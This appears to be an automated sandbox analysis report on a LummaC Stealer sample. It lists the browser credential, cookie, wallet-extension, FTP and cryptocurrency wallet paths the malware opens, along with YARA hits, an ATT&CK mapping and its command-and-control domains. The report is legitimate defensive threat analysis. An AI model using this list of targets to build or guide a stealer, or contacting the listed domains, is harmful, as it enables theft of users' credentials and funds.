Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\VAMYDFPUND	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior

Source: Yara match	File source: 00000001.00000003.1924594667.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1925146540.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1924702653.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1905255414.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923050702.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923396438.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1878943431.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923653553.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923498896.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1924143105.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1879080551.0000000003458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1904508771.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923232078.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1924823683.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922785286.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1892683034.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1903267214.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 2596, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dxdiag.exe PID: 2596, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	41 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WSLRT.exe	58%	Virustotal		Browse
WSLRT.exe	55%	ReversingLabs	Win32.Exploit.LummaC
WSLRT.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://fixxyplanterv.click/la	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiM	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/jh	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/obC3	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/api?4	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/apiP	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/pi	0%	Avira URL Cloud	safe
fixxyplanterv.click	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/api	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/api&3	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/:	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/C3	0%	Avira URL Cloud	safe
https://fixxyplanterv.click:443/api	0%	Avira URL Cloud	safe
https://fixxyplanterv.click/ob	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fixxyplanterv.click	172.67.134.197	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
dare-curbys.biz	false		high
impend-differ.biz	false		high
dwell-exclaim.biz	false		high
zinc-sneark.biz	false		high
fixxyplanterv.click	true	Avira URL Cloud: safe	unknown
formy-spill.biz	false		high
se-blurry.biz	false		high
covery-mover.biz	false		high
https://fixxyplanterv.click/api	true	Avira URL Cloud: safe	unknown
print-vexer.biz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fixxyplanterv.click/obC3	dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	false		high
